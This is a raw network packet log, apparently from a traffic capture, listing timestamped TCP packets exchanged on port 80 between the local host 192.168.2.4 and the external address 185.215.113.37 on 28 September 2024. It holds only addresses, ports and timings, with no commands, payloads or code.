Sep 28, 2024 21:26:17.096422911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096457958 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096457958 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096553087 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096564054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096573114 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096605062 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096636057 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096662998 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096673012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096682072 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096690893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096699953 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096709967 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096720934 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096731901 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096731901 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096772909 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096772909 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096772909 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096877098 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096887112 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096923113 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096942902 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096942902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096955061 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096963882 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.096997023 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.096997023 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097121954 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097131014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097140074 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097150087 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097157955 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097166061 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097174883 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097183943 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097184896 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097187042 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097218990 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097218990 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097249031 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097347021 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097357035 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097364902 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097374916 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097400904 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097400904 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097433090 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097461939 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097472906 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097507000 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097537994 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097625971 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097636938 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097645998 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097655058 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097664118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097671032 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097704887 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097704887 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097724915 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097734928 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097770929 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097843885 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097853899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097862005 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097872019 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097879887 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097897053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.097917080 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097917080 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097917080 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.097959995 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098155975 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098166943 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098175049 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098185062 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098193884 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098201990 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098212004 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098212004 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098227978 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098238945 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098243952 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098243952 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098251104 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098263025 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098265886 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098283052 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098308086 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098308086 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098468065 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098479033 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098486900 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098498106 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098509073 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098525047 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098525047 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098557949 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098627090 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098635912 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098647118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098656893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098666906 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098679066 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098686934 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098686934 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098695040 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098706961 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.098706961 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098757029 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098757029 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.098757982 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.191284895 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191350937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191360950 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191374063 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.191438913 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.191438913 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.191446066 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191457987 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191468000 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191478014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191488981 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191498995 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.191498995 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.191519022 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.191555977 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.191625118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191637039 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191672087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.191694021 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191704988 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191723108 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191734076 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191736937 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.191745043 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.191755056 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.191771984 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.191798925 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.192307949 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.192317009 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.192334890 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.192346096 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.192353964 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.192356110 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.192384958 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.192416906 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.192490101 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.192500114 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.192509890 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.192521095 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.192542076 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.192542076 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.192574024 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.194678068 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.194698095 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.194705963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.194726944 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.194760084 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.194818020 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.194833040 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.194843054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.194854021 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.194861889 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.194890022 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.194920063 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.194958925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.194968939 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.194988966 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.195003033 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.195009947 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.195009947 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.195035934 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.195035934 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.195204973 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.195215940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.195225954 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.195236921 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.195247889 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.195257902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.195257902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.195300102 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.195301056 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.195804119 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.195822954 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.195832014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.195849895 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.195880890 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.195904016 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.195919991 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.195930958 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.195949078 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.195981026 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.195981026 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196065903 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196077108 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196085930 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196109056 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196140051 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196249008 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196265936 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196276903 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196286917 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196296930 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196300983 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196300983 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196310043 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196321011 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196346045 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196346045 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196548939 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196561098 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196569920 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196580887 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196590900 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196597099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196597099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196604013 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196619987 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196650028 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196650982 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196691036 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196707010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196738958 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196738958 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196896076 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196911097 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196919918 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196930885 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196940899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196943998 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196949959 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196962118 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196970940 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196970940 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196973085 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196985006 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.196990013 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.196996927 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197016001 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197016001 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197035074 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197165966 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197208881 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197365999 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197376966 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197386026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197395086 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197405100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197416067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197415113 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197427034 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197438002 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197443008 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197443008 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197449923 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197462082 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197468996 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197468996 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197473049 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197485924 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197495937 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197506905 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197515011 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197515011 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197515965 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197518110 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197530985 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197546959 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197546959 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197582006 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197740078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197751045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197761059 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197788000 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197803020 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197813988 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197823048 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197828054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197832108 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197838068 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197839022 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197850943 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197860956 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197861910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.197880030 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197904110 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.197904110 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198129892 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198142052 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198152065 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198163986 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198174000 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198175907 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198185921 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198198080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198203087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198203087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198221922 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198246956 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198441982 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198452950 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198462963 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198472977 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198482990 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198493004 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198494911 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198494911 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198503971 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198514938 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198514938 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198525906 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198538065 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198542118 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198542118 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198559999 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198579073 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198748112 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198756933 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198766947 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198775053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198784113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.198790073 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198828936 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198828936 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.198828936 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.283951998 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.283963919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.283968925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.284029007 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.284038067 CEST	80	49732	185.215.113.37	192.168.2.4
